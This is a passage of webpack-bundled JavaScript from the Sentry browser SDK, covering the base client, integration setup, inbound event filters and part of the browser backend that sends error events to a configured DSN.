 * {@link Client.getBackend}.
 *
 * If a Dsn is specified in the options, it will be parsed and stored. Use
 * {@link Client.getDsn} to retrieve the Dsn at any moment. In case the Dsn is
 * invalid, the constructor will throw a {@link SentryException}. Note that
 * without a valid Dsn, the SDK will not send any events to Sentry.
 *
 * Before sending an event via the backend, it is passed through
 * {@link BaseClient.prepareEvent} to add SDK information and scope data
 * (breadcrumbs and context). To add more custom information, override this
 * method and extend the resulting prepared event.
 *
 * To issue automatically created events (e.g. via instrumentation), use
 * {@link Client.captureEvent}. It will prepare the event and pass it through
 * the callback lifecycle. To issue auto-breadcrumbs, use
 * {@link Client.addBreadcrumb}.
 *
 * @example
 * class NodeClient extends BaseClient<NodeBackend, NodeOptions> {
 *   public constructor(options: NodeOptions) {
 *     super(NodeBackend, options);
 *   }
 *
 *   // ...
 * }
 */
var BaseClient = /** @class */ (function () {
    /**
     * Initializes this client instance.
     *
     * @param backendClass A constructor function to create the backend.
     * @param options Options for the client.
     */
    function BaseClient(backendClass, options) {
        /** Is the client still processing a call? */
        this._processing = false;
        this._backend = new backendClass(options);
        this._options = options;
        if (options.dsn) {
            this._dsn = new __WEBPACK_IMPORTED_MODULE_2__dsn__["a" /* Dsn */](options.dsn);
        }
        this._integrations = Object(__WEBPACK_IMPORTED_MODULE_3__integration__["a" /* setupIntegrations */])(this._options);
    }
    /**
     * @inheritDoc
     */
    BaseClient.prototype.captureException = function (exception, hint, scope) {
        var _this = this;
        var eventId = hint && hint.event_id;
        this._processing = true;
        this._getBackend()
            .eventFromException(exception, hint)
            .then(function (event) { return _this._processEvent(event, hint, scope); })
            .then(function (finalEvent) {
            // We need to check for finalEvent in case beforeSend returned null
            eventId = finalEvent && finalEvent.event_id;
            _this._processing = false;
        })
            .catch(function (reason) {
            __WEBPACK_IMPORTED_MODULE_1__sentry_utils__["t" /* logger */].error(reason);
            _this._processing = false;
        });
        return eventId;
    };
    /**
     * @inheritDoc
     */
    BaseClient.prototype.captureMessage = function (message, level, hint, scope) {
        var _this = this;
        var eventId = hint && hint.event_id;
        this._processing = true;
        var promisedEvent = Object(__WEBPACK_IMPORTED_MODULE_1__sentry_utils__["p" /* isPrimitive */])(message)
            ? this._getBackend().eventFromMessage("" + message, level, hint)
            : this._getBackend().eventFromException(message, hint);
        promisedEvent
            .then(function (event) { return _this._processEvent(event, hint, scope); })
            .then(function (finalEvent) {
            // We need to check for finalEvent in case beforeSend returned null
            eventId = finalEvent && finalEvent.event_id;
            _this._processing = false;
        })
            .catch(function (reason) {
            __WEBPACK_IMPORTED_MODULE_1__sentry_utils__["t" /* logger */].error(reason);
            _this._processing = false;
        });
        return eventId;
    };
    /**
     * @inheritDoc
     */
    BaseClient.prototype.captureEvent = function (event, hint, scope) {
        var _this = this;
        var eventId = hint && hint.event_id;
        this._processing = true;
        this._processEvent(event, hint, scope)
            .then(function (finalEvent) {
            // We need to check for finalEvent in case beforeSend returned null
            eventId = finalEvent && finalEvent.event_id;
            _this._processing = false;
        })
            .catch(function (reason) {
            __WEBPACK_IMPORTED_MODULE_1__sentry_utils__["t" /* logger */].error(reason);
            _this._processing = false;
        });
        return eventId;
    };
    /**
     * @inheritDoc
     */
    BaseClient.prototype.getDsn = function () {
        return this._dsn;
    };
    /**
     * @inheritDoc
     */
    BaseClient.prototype.getOptions = function () {
        return this._options;
    };
    /**
     * @inheritDoc
     */
    BaseClient.prototype.flush = function (timeout) {
        var _this = this;
        return this._isClientProcessing(timeout).then(function (status) {
            clearInterval(status.interval);
            return _this._getBackend()
                .getTransport()
                .close(timeout)
                .then(function (transportFlushed) { return status.ready && transportFlushed; });
        });
    };
    /**
     * @inheritDoc
     */
    BaseClient.prototype.close = function (timeout) {
        var _this = this;
        return this.flush(timeout).then(function (result) {
            _this.getOptions().enabled = false;
            return result;
        });
    };
    /**
     * @inheritDoc
     */
    BaseClient.prototype.getIntegrations = function () {
        return this._integrations || {};
    };
    /**
     * @inheritDoc
     */
    BaseClient.prototype.getIntegration = function (integration) {
        try {
            return this._integrations[integration.id] || null;
        }
        catch (_oO) {
            __WEBPACK_IMPORTED_MODULE_1__sentry_utils__["t" /* logger */].warn("Cannot retrieve integration " + integration.id + " from the current Client");
            return null;
        }
    };
    /** Waits for the client to be done with processing. */
    BaseClient.prototype._isClientProcessing = function (timeout) {
        var _this = this;
        return new Promise(function (resolve) {
            var ticked = 0;
            var tick = 1;
            var interval = 0;
            clearInterval(interval);
            interval = setInterval(function () {
                if (!_this._processing) {
                    resolve({
                        interval: interval,
                        ready: true,
                    });
                }
                else {
                    ticked += tick;
                    if (timeout && ticked >= timeout) {
                        resolve({
                            interval: interval,
                            ready: false,
                        });
                    }
                }
            }, tick);
        });
    };
    /** Returns the current backend. */
    BaseClient.prototype._getBackend = function () {
        return this._backend;
    };
    /** Determines whether this SDK is enabled and a valid Dsn is present. */
    BaseClient.prototype._isEnabled = function () {
        return this.getOptions().enabled !== false && this._dsn !== undefined;
    };
    /**
     * Adds common information to events.
     *
     * The information includes release and environment from `options`,
     * breadcrumbs and context (extra, tags and user) from the scope.
     *
     * Information that is already present in the event is never overwritten. For
     * nested objects, such as the context, keys are merged.
     *
     * @param event The original event.
     * @param hint May contain additional informartion about the original exception.
     * @param scope A scope containing event metadata.
     * @returns A new event with more information.
     */
    BaseClient.prototype._prepareEvent = function (event, scope, hint) {
        var _a = this.getOptions(), environment = _a.environment, release = _a.release, dist = _a.dist, _b = _a.maxValueLength, maxValueLength = _b === void 0 ? 250 : _b;
        var prepared = __WEBPACK_IMPORTED_MODULE_0_tslib__["a" /* __assign */]({}, event);
        if (prepared.environment === undefined && environment !== undefined) {
            prepared.environment = environment;
        }
        if (prepared.release === undefined && release !== undefined) {
            prepared.release = release;
        }
        if (prepared.dist === undefined && dist !== undefined) {
            prepared.dist = dist;
        }
        if (prepared.message) {
            prepared.message = Object(__WEBPACK_IMPORTED_MODULE_1__sentry_utils__["C" /* truncate */])(prepared.message, maxValueLength);
        }
        var exception = prepared.exception && prepared.exception.values && prepared.exception.values[0];
        if (exception && exception.value) {
            exception.value = Object(__WEBPACK_IMPORTED_MODULE_1__sentry_utils__["C" /* truncate */])(exception.value, maxValueLength);
        }
        var request = prepared.request;
        if (request && request.url) {
            request.url = Object(__WEBPACK_IMPORTED_MODULE_1__sentry_utils__["C" /* truncate */])(request.url, maxValueLength);
        }
        if (prepared.event_id === undefined) {
            prepared.event_id = Object(__WEBPACK_IMPORTED_MODULE_1__sentry_utils__["E" /* uuid4 */])();
        }
        this._addIntegrations(prepared.sdk);
        // We prepare the result here with a resolved Event.
        var result = __WEBPACK_IMPORTED_MODULE_1__sentry_utils__["c" /* SyncPromise */].resolve(prepared);
        // This should be the last thing called, since we want that
        // {@link Hub.addEventProcessor} gets the finished prepared event.
        if (scope) {
            // In case we have a hub we reassign it.
            result = scope.applyToEvent(prepared, hint);
        }
        return result;
    };
    /**
     * This function adds all used integrations to the SDK info in the event.
     * @param sdkInfo The sdkInfo of the event that will be filled with all integrations.
     */
    BaseClient.prototype._addIntegrations = function (sdkInfo) {
        var integrationsArray = Object.keys(this._integrations);
        if (sdkInfo && integrationsArray.length > 0) {
            sdkInfo.integrations = integrationsArray;
        }
    };
    /**
     * Processes an event (either error or message) and sends it to Sentry.
     *
     * This also adds breadcrumbs and context information to the event. However,
     * platform specific meta data (such as the User's IP address) must be added
     * by the SDK implementor.
     *
     *
     * @param event The event to send to Sentry.
     * @param hint May contain additional informartion about the original exception.
     * @param scope A scope containing event metadata.
     * @returns A SyncPromise that resolves with the event or rejects in case event was/will not be send.
     */
    BaseClient.prototype._processEvent = function (event, hint, scope) {
        var _this = this;
        var _a = this.getOptions(), beforeSend = _a.beforeSend, sampleRate = _a.sampleRate;
        if (!this._isEnabled()) {
            return __WEBPACK_IMPORTED_MODULE_1__sentry_utils__["c" /* SyncPromise */].reject('SDK not enabled, will not send event.');
        }
        // 1.0 === 100% events are sent
        // 0.0 === 0% events are sent
        if (typeof sampleRate === 'number' && Math.random() > sampleRate) {
            return __WEBPACK_IMPORTED_MODULE_1__sentry_utils__["c" /* SyncPromise */].reject('This event has been sampled, will not send event.');
        }
        return new __WEBPACK_IMPORTED_MODULE_1__sentry_utils__["c" /* SyncPromise */](function (resolve, reject) {
            _this._prepareEvent(event, scope, hint).then(function (prepared) {
                if (prepared === null) {
                    reject('An event processor returned null, will not send event.');
                    return;
                }
                var finalEvent = prepared;
                try {
                    var isInternalException = hint && hint.data && hint.data.__sentry__ === true;
                    if (isInternalException || !beforeSend) {
                        _this._getBackend().sendEvent(finalEvent);
                        resolve(finalEvent);
                        return;
                    }
                    var beforeSendResult = beforeSend(prepared, hint);
                    if (typeof beforeSendResult === 'undefined') {
                        __WEBPACK_IMPORTED_MODULE_1__sentry_utils__["t" /* logger */].error('`beforeSend` method has to return `null` or a valid event.');
                    }
                    else if (Object(__WEBPACK_IMPORTED_MODULE_1__sentry_utils__["r" /* isThenable */])(beforeSendResult)) {
                        _this._handleAsyncBeforeSend(beforeSendResult, resolve, reject);
                    }
                    else {
                        finalEvent = beforeSendResult;
                        if (finalEvent === null) {
                            __WEBPACK_IMPORTED_MODULE_1__sentry_utils__["t" /* logger */].log('`beforeSend` returned `null`, will not send event.');
                            resolve(null);
                            return;
                        }
                        // From here on we are really async
                        _this._getBackend().sendEvent(finalEvent);
                        resolve(finalEvent);
                    }
                }
                catch (exception) {
                    _this.captureException(exception, {
                        data: {
                            __sentry__: true,
                        },
                        originalException: exception,
                    });
                    reject('`beforeSend` throw an error, will not send event.');
                }
            });
        });
    };
    /**
     * Resolves before send Promise and calls resolve/reject on parent SyncPromise.
     */
    BaseClient.prototype._handleAsyncBeforeSend = function (beforeSend, resolve, reject) {
        var _this = this;
        beforeSend
            .then(function (processedEvent) {
            if (processedEvent === null) {
                reject('`beforeSend` returned `null`, will not send event.');
                return;
            }
            // From here on we are really async
            _this._getBackend().sendEvent(processedEvent);
            resolve(processedEvent);
        })
            .catch(function (e) {
            reject("beforeSend rejected with " + e);
        });
    };
    return BaseClient;
}());

//# sourceMappingURL=baseclient.js.map

/***/ }),
/* 3227 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* unused harmony export installedIntegrations */
/* unused harmony export getIntegrationsToSetup */
/* unused harmony export setupIntegration */
/* harmony export (immutable) */ __webpack_exports__["a"] = setupIntegrations;
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_tslib__ = __webpack_require__(64);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__sentry_hub__ = __webpack_require__(374);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__sentry_utils__ = __webpack_require__(53);



var installedIntegrations = [];
/** Gets integration to install */
function getIntegrationsToSetup(options) {
    var defaultIntegrations = (options.defaultIntegrations && __WEBPACK_IMPORTED_MODULE_0_tslib__["f" /* __spread */](options.defaultIntegrations)) || [];
    var userIntegrations = options.integrations;
    var integrations = [];
    if (Array.isArray(userIntegrations)) {
        var userIntegrationsNames_1 = userIntegrations.map(function (i) { return i.name; });
        var pickedIntegrationsNames_1 = [];
        // Leave only unique default integrations, that were not overridden with provided user integrations
        defaultIntegrations.forEach(function (defaultIntegration) {
            if (userIntegrationsNames_1.indexOf(defaultIntegration.name) === -1 &&
                pickedIntegrationsNames_1.indexOf(defaultIntegration.name) === -1) {
                integrations.push(defaultIntegration);
                pickedIntegrationsNames_1.push(defaultIntegration.name);
            }
        });
        // Don't add same user integration twice
        userIntegrations.forEach(function (userIntegration) {
            if (pickedIntegrationsNames_1.indexOf(userIntegration.name) === -1) {
                integrations.push(userIntegration);
                pickedIntegrationsNames_1.push(userIntegration.name);
            }
        });
    }
    else if (typeof userIntegrations === 'function') {
        integrations = userIntegrations(defaultIntegrations);
        integrations = Array.isArray(integrations) ? integrations : [integrations];
    }
    else {
        return __WEBPACK_IMPORTED_MODULE_0_tslib__["f" /* __spread */](defaultIntegrations);
    }
    return integrations;
}
/** Setup given integration */
function setupIntegration(integration) {
    if (installedIntegrations.indexOf(integration.name) !== -1) {
        return;
    }
    integration.setupOnce(__WEBPACK_IMPORTED_MODULE_1__sentry_hub__["a" /* addGlobalEventProcessor */], __WEBPACK_IMPORTED_MODULE_1__sentry_hub__["b" /* getCurrentHub */]);
    installedIntegrations.push(integration.name);
    __WEBPACK_IMPORTED_MODULE_2__sentry_utils__["t" /* logger */].log("Integration installed: " + integration.name);
}
/**
 * Given a list of integration instances this installs them all. When `withDefaults` is set to `true` then all default
 * integrations are added unless they were already provided before.
 * @param integrations array of integration instances
 * @param withDefault should enable default integrations
 */
function setupIntegrations(options) {
    var integrations = {};
    getIntegrationsToSetup(options).forEach(function (integration) {
        integrations[integration.name] = integration;
        setupIntegration(integration);
    });
    return integrations;
}
//# sourceMappingURL=integration.js.map

/***/ }),
/* 3228 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return BaseBackend; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__sentry_utils__ = __webpack_require__(53);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__transports_noop__ = __webpack_require__(1425);


/**
 * This is the base implemention of a Backend.
 * @hidden
 */
var BaseBackend = /** @class */ (function () {
    /** Creates a new backend instance. */
    function BaseBackend(options) {
        this._options = options;
        if (!this._options.dsn) {
            __WEBPACK_IMPORTED_MODULE_0__sentry_utils__["t" /* logger */].warn('No DSN provided, backend will not do anything.');
        }
        this._transport = this._setupTransport();
    }
    /**
     * Sets up the transport so it can be used later to send requests.
     */
    BaseBackend.prototype._setupTransport = function () {
        return new __WEBPACK_IMPORTED_MODULE_1__transports_noop__["a" /* NoopTransport */]();
    };
    /**
     * @inheritDoc
     */
    BaseBackend.prototype.eventFromException = function (_exception, _hint) {
        throw new __WEBPACK_IMPORTED_MODULE_0__sentry_utils__["b" /* SentryError */]('Backend has to implement `eventFromException` method');
    };
    /**
     * @inheritDoc
     */
    BaseBackend.prototype.eventFromMessage = function (_message, _level, _hint) {
        throw new __WEBPACK_IMPORTED_MODULE_0__sentry_utils__["b" /* SentryError */]('Backend has to implement `eventFromMessage` method');
    };
    /**
     * @inheritDoc
     */
    BaseBackend.prototype.sendEvent = function (event) {
        this._transport.sendEvent(event).catch(function (reason) {
            __WEBPACK_IMPORTED_MODULE_0__sentry_utils__["t" /* logger */].error("Error while sending event: " + reason);
        });
    };
    /**
     * @inheritDoc
     */
    BaseBackend.prototype.getTransport = function () {
        return this._transport;
    };
    return BaseBackend;
}());

//# sourceMappingURL=basebackend.js.map

/***/ }),
/* 3229 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (immutable) */ __webpack_exports__["a"] = initAndBind;
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__sentry_hub__ = __webpack_require__(374);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__sentry_utils__ = __webpack_require__(53);


/**
 * Internal function to create a new SDK client instance. The client is
 * installed and then bound to the current scope.
 *
 * @param clientClass The client class to instanciate.
 * @param options Options to pass to the client.
 */
function initAndBind(clientClass, options) {
    if (options.debug === true) {
        __WEBPACK_IMPORTED_MODULE_1__sentry_utils__["t" /* logger */].enable();
    }
    Object(__WEBPACK_IMPORTED_MODULE_0__sentry_hub__["b" /* getCurrentHub */])().bindClient(new clientClass(options));
}
//# sourceMappingURL=sdk.js.map

/***/ }),
/* 3230 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
Object.defineProperty(__webpack_exports__, "__esModule", { value: true });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__functiontostring__ = __webpack_require__(3231);
/* harmony reexport (binding) */ __webpack_require__.d(__webpack_exports__, "FunctionToString", function() { return __WEBPACK_IMPORTED_MODULE_0__functiontostring__["a"]; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__inboundfilters__ = __webpack_require__(3232);
/* harmony reexport (binding) */ __webpack_require__.d(__webpack_exports__, "InboundFilters", function() { return __WEBPACK_IMPORTED_MODULE_1__inboundfilters__["a"]; });


//# sourceMappingURL=index.js.map

/***/ }),
/* 3231 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return FunctionToString; });
var originalFunctionToString;
/** Patch toString calls to return proper name for wrapped functions */
var FunctionToString = /** @class */ (function () {
    function FunctionToString() {
        /**
         * @inheritDoc
         */
        this.name = FunctionToString.id;
    }
    /**
     * @inheritDoc
     */
    FunctionToString.prototype.setupOnce = function () {
        originalFunctionToString = Function.prototype.toString;
        Function.prototype.toString = function () {
            var args = [];
            for (var _i = 0; _i < arguments.length; _i++) {
                args[_i] = arguments[_i];
            }
            var context = this.__sentry__ ? this.__sentry_original__ : this;
            // tslint:disable-next-line:no-unsafe-any
            return originalFunctionToString.apply(context, args);
        };
    };
    /**
     * @inheritDoc
     */
    FunctionToString.id = 'FunctionToString';
    return FunctionToString;
}());

//# sourceMappingURL=functiontostring.js.map

/***/ }),
/* 3232 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return InboundFilters; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_tslib__ = __webpack_require__(64);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__sentry_hub__ = __webpack_require__(374);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__sentry_utils__ = __webpack_require__(53);



// "Script error." is hard coded into browsers for errors that it can't read.
// this is the result of a script being pulled in from an external domain and CORS.
var DEFAULT_IGNORE_ERRORS = [/^Script error\.?$/, /^Javascript error: Script error\.? on line 0$/];
/** Inbound filters configurable by the user */
var InboundFilters = /** @class */ (function () {
    function InboundFilters(_options) {
        if (_options === void 0) { _options = {}; }
        this._options = _options;
        /**
         * @inheritDoc
         */
        this.name = InboundFilters.id;
    }
    /**
     * @inheritDoc
     */
    InboundFilters.prototype.setupOnce = function () {
        Object(__WEBPACK_IMPORTED_MODULE_1__sentry_hub__["a" /* addGlobalEventProcessor */])(function (event) {
            var hub = Object(__WEBPACK_IMPORTED_MODULE_1__sentry_hub__["b" /* getCurrentHub */])();
            if (!hub) {
                return event;
            }
            var self = hub.getIntegration(InboundFilters);
            if (self) {
                var client = hub.getClient();
                var clientOptions = client ? client.getOptions() : {};
                var options = self._mergeOptions(clientOptions);
                if (self._shouldDropEvent(event, options)) {
                    return null;
                }
            }
            return event;
        });
    };
    /** JSDoc */
    InboundFilters.prototype._shouldDropEvent = function (event, options) {
        if (this._isSentryError(event, options)) {
            __WEBPACK_IMPORTED_MODULE_2__sentry_utils__["t" /* logger */].warn("Event dropped due to being internal Sentry Error.\nEvent: " + Object(__WEBPACK_IMPORTED_MODULE_2__sentry_utils__["h" /* getEventDescription */])(event));
            return true;
        }
        if (this._isIgnoredError(event, options)) {
            __WEBPACK_IMPORTED_MODULE_2__sentry_utils__["t" /* logger */].warn("Event dropped due to being matched by `ignoreErrors` option.\nEvent: " + Object(__WEBPACK_IMPORTED_MODULE_2__sentry_utils__["h" /* getEventDescription */])(event));
            return true;
        }
        if (this._isBlacklistedUrl(event, options)) {
            __WEBPACK_IMPORTED_MODULE_2__sentry_utils__["t" /* logger */].warn("Event dropped due to being matched by `blacklistUrls` option.\nEvent: " + Object(__WEBPACK_IMPORTED_MODULE_2__sentry_utils__["h" /* getEventDescription */])(event) + ".\nUrl: " + this._getEventFilterUrl(event));
            return true;
        }
        if (!this._isWhitelistedUrl(event, options)) {
            __WEBPACK_IMPORTED_MODULE_2__sentry_utils__["t" /* logger */].warn("Event dropped due to not being matched by `whitelistUrls` option.\nEvent: " + Object(__WEBPACK_IMPORTED_MODULE_2__sentry_utils__["h" /* getEventDescription */])(event) + ".\nUrl: " + this._getEventFilterUrl(event));
            return true;
        }
        return false;
    };
    /** JSDoc */
    InboundFilters.prototype._isSentryError = function (event, options) {
        if (options === void 0) { options = {}; }
        if (!options.ignoreInternal) {
            return false;
        }
        try {
            // tslint:disable-next-line:no-unsafe-any
            return event.exception.values[0].type === 'SentryError';
        }
        catch (_oO) {
            return false;
        }
    };
    /** JSDoc */
    InboundFilters.prototype._isIgnoredError = function (event, options) {
        if (options === void 0) { options = {}; }
        if (!options.ignoreErrors || !options.ignoreErrors.length) {
            return false;
        }
        return this._getPossibleEventMessages(event).some(function (message) {
            // Not sure why TypeScript complains here...
            return options.ignoreErrors.some(function (pattern) { return Object(__WEBPACK_IMPORTED_MODULE_2__sentry_utils__["n" /* isMatchingPattern */])(message, pattern); });
        });
    };
    /** JSDoc */
    InboundFilters.prototype._isBlacklistedUrl = function (event, options) {
        if (options === void 0) { options = {}; }
        // TODO: Use Glob instead?
        if (!options.blacklistUrls || !options.blacklistUrls.length) {
            return false;
        }
        var url = this._getEventFilterUrl(event);
        return !url ? false : options.blacklistUrls.some(function (pattern) { return Object(__WEBPACK_IMPORTED_MODULE_2__sentry_utils__["n" /* isMatchingPattern */])(url, pattern); });
    };
    /** JSDoc */
    InboundFilters.prototype._isWhitelistedUrl = function (event, options) {
        if (options === void 0) { options = {}; }
        // TODO: Use Glob instead?
        if (!options.whitelistUrls || !options.whitelistUrls.length) {
            return true;
        }
        var url = this._getEventFilterUrl(event);
        return !url ? true : options.whitelistUrls.some(function (pattern) { return Object(__WEBPACK_IMPORTED_MODULE_2__sentry_utils__["n" /* isMatchingPattern */])(url, pattern); });
    };
    /** JSDoc */
    InboundFilters.prototype._mergeOptions = function (clientOptions) {
        if (clientOptions === void 0) { clientOptions = {}; }
        return {
            blacklistUrls: __WEBPACK_IMPORTED_MODULE_0_tslib__["f" /* __spread */]((this._options.blacklistUrls || []), (clientOptions.blacklistUrls || [])),
            ignoreErrors: __WEBPACK_IMPORTED_MODULE_0_tslib__["f" /* __spread */]((this._options.ignoreErrors || []), (clientOptions.ignoreErrors || []), DEFAULT_IGNORE_ERRORS),
            ignoreInternal: typeof this._options.ignoreInternal !== 'undefined' ? this._options.ignoreInternal : true,
            whitelistUrls: __WEBPACK_IMPORTED_MODULE_0_tslib__["f" /* __spread */]((this._options.whitelistUrls || []), (clientOptions.whitelistUrls || [])),
        };
    };
    /** JSDoc */
    InboundFilters.prototype._getPossibleEventMessages = function (event) {
        if (event.message) {
            return [event.message];
        }
        if (event.exception) {
            try {
                // tslint:disable-next-line:no-unsafe-any
                var _a = event.exception.values[0], type = _a.type, value = _a.value;
                return ["" + value, type + ": " + value];
            }
            catch (oO) {
                __WEBPACK_IMPORTED_MODULE_2__sentry_utils__["t" /* logger */].error("Cannot extract message for event " + Object(__WEBPACK_IMPORTED_MODULE_2__sentry_utils__["h" /* getEventDescription */])(event));
                return [];
            }
        }
        return [];
    };
    /** JSDoc */
    InboundFilters.prototype._getEventFilterUrl = function (event) {
        try {
            if (event.stacktrace) {
                // tslint:disable:no-unsafe-any
                var frames_1 = event.stacktrace.frames;
                return frames_1[frames_1.length - 1].filename;
            }
            if (event.exception) {
                // tslint:disable:no-unsafe-any
                var frames_2 = event.exception.values[0].stacktrace.frames;
                return frames_2[frames_2.length - 1].filename;
            }
            return null;
        }
        catch (oO) {
            __WEBPACK_IMPORTED_MODULE_2__sentry_utils__["t" /* logger */].error("Cannot extract url for event " + Object(__WEBPACK_IMPORTED_MODULE_2__sentry_utils__["h" /* getEventDescription */])(event));
            return null;
        }
    };
    /**
     * @inheritDoc
     */
    InboundFilters.id = 'InboundFilters';
    return InboundFilters;
}());

//# sourceMappingURL=inboundfilters.js.map

/***/ }),
/* 3233 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return BrowserBackend; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_tslib__ = __webpack_require__(64);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__sentry_core__ = __webpack_require__(136);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__sentry_types__ = __webpack_require__(285);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3__sentry_utils__ = __webpack_require__(53);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4__parsers__ = __webpack_require__(771);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5__tracekit__ = __webpack_require__(515);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_6__transports__ = __webpack_require__(1427);







/**
 * The Sentry Browser SDK Backend.
 * @hidden
 */
var BrowserBackend = /** @class */ (function (_super) {
    __WEBPACK_IMPORTED_MODULE_0_tslib__["c" /* __extends */](BrowserBackend, _super);
    function BrowserBackend() {
        return _super !== null && _super.apply(this, arguments) || this;
    }
    /**
     * @inheritDoc
     */
    BrowserBackend.prototype._setupTransport = function () {
        if (!this._options.dsn) {
            // We return the noop transport here in case there is no Dsn.
            return _super.prototype._setupTransport.call(this);
        }
        var transportOptions = __WEBPACK_IMPORTED_MODULE_0_tslib__["a" /* __assign */]({}, this._options.transportOptions, { dsn: this._options.dsn });
        if (this._options.transport) {
            return new this._options.transport(transportOptions);
        }
        if (Object(__WEBPACK_IMPORTED_MODULE_3__sentry_utils__["y" /* supportsFetch */])()) {
            return new __WEBPACK_IMPORTED_MODULE_6__transports__["a" /* FetchTransport */](transportOptions);
        }
        return new __WEBPACK_IMPORTED_MODULE_6__transports__["b" /* XHRTransport */](transportOptions);
    };
    /**
     * @inheritDoc
     */
    BrowserBackend.prototype.eventFromException = function (exception, hint) {
        var _this = this;
        var event;
        if (Object(__WEBPACK_IMPORTED_MODULE_3__sentry_utils__["m" /* isErrorEvent */])(exception) && exception.error) {
            // If it is an ErrorEvent with `error` property, extract it to get actual Error
            var errorEvent = exception;
            exception = errorEvent.error; // tslint:disable-line:no-parameter-reassignment
            event = Object(__WEBPACK_IMPORTED_MODULE_4__parsers__["b" /* eventFromStacktrace */])(Object(__WEBPACK_IMPORTED_MODULE_5__tracekit__["a" /* _computeStackTrace */])(exception));
            return __WEBPACK_IMPORTED_MODULE_3__sentry_utils__["c" /* SyncPromise */].resolve(this._buildEvent(event, hint));
        }
        if (Object(__WEBPACK_IMPORTED_MODULE_3__sentry_utils__["j" /* isDOMError */])(exception) || Object(__WEBPACK_IMPORTED_MODULE_3__sentry_utils__["k" /* isDOMException */])(exception)) {
            // If it is a DOMError or DOMException (which are legacy APIs, but still supported in some browsers)
            // then we just extract the name and message, as they don't provide anything else
            // https://developer.mozilla.org/en-US/docs/Web/API/DOMError
            // https://developer.mozilla.org/en-US/docs/Web/API/DOMException
            var domException = exception;
            var name_1 = domException.name || (Object(__WEBPACK_IMPORTED_MODULE_3__sentry_utils__["j" /* isDOMError */])(domException) ? 'DOMError' : 'DOMException');
            var message_1 = domException.message ? name_1 + ": " + domException.message : name_1;
            return this.eventFromMessage(message_1, __WEBPACK_IMPORTED_MODULE_2__sentry_types__["a" /* Severity */].Error, hint).then(function (messageEvent) {
                Object(__WEBPACK_IMPORTED_MODULE_3__sentry_utils__["d" /* addExceptionTypeValue */])(messageEvent, message_1);
                return __WEBPACK_IMPORTED_MODULE_3__sentry_utils__["c" /* SyncPromise */].resolve(_this._buildEvent(messageEvent, hint));
            });
        }
        if (Object(__WEBPACK_IMPORTED_MODULE_3__sentry_utils__["l" /* isError */])(exception)) {
            // we have a real Error object, do nothing
            event = Object(__WEBPACK_IMPORTED_MODULE_4__parsers__["b" /* eventFromStacktrace */])(Object(__WEBPACK_IMPORTED_MODULE_5__tracekit__["a" /* _computeStackTrace */])(exception));
            return __WEBPACK_IMPORTED_MODULE_3__sentry_utils__["c" /* SyncPromise */].resolve(this._buildEvent(event, hint));
        }
        if (Object(__WEBPACK_IMPORTED_MODULE_3__sentry_utils__["o" /* isPlainObject */])(exception) && hint && hint.syntheticException) {
            // If it is plain Object, serialize it manually and extract options
            // This will allow us to group events based on top-level keys
            // which is much better than creating new group when any key/value change
            var objectException = exception;
            event = Object(__WEBPACK_IMPORTED_MODULE_4__parsers__["a" /* eventFromPlainObject */])(objectException, hint.syntheticException);
            Object(__WEBPACK_IMPORTED_MODULE_3__sentry_utils__["d" /* addExceptionTypeValue */])(event, 'Custom Object', undefined, {
                handled: true,
                synthetic: true,
                type: 'generic',
            });
            event.level = __WEBPACK_IMPORTED_MODULE_2__sentry_types__["a" /* Severity */].Error;
            return __WEBPACK_IMPORTED_MODULE_3__sentry_utils__["c" /* SyncPromise */].resolve(this._buildEvent(event, hint));
        }
        // If none of previous checks were valid, then it means that
        // it's not a DOMError/DOMException
        // it's not a plain Object
        // it's not a valid ErrorEvent (one with an error property)
        // it's not an Error
        // So bail out and capture it as a simple message:
        var stringException = exception;
        return this.eventFromMessage(stringException, undefined, hint).then(function (messageEvent) {
            Object(__WEBPACK_IMPORTED_MODULE_3__sentry_utils__["d" /* addExceptionTypeValue */])(messageEvent, "" + stringException, undefined, {
                handled: true,
                synthetic: true,
                type: 'generic',
            });
            messageEvent.level = __WEBPACK_IMPORTED_MODULE_2__sentry_types__["a" /* Severity */].Error;
            return __WEBPACK_IMPORTED_MODULE_3__sentry_utils__["c" /* SyncPromise */].resolve(_this._buildEvent(messageEvent, hint));
        });
    };
    /**
     * This is an internal helper function that creates an event.
     */
    BrowserBackend.prototype._buildEvent = function (event, hint) {
        return __WEBPACK_IMPORTED_MODULE_0_tslib__["a" /* __assign */]({}, event, { event_id: hint && hint.event_id });
    };
    /**
     * @inheritDoc
     */
    BrowserBackend.prototype.eventFromMessage = function (message, level, hint) {
        if (level === void 0) { level = __WEBPACK_IMPORTED_MODULE_2__sentry_types__["a" /* Severity */].Info; }
        var event = {
            event_id: hint && hint.event_id,
            level: level,
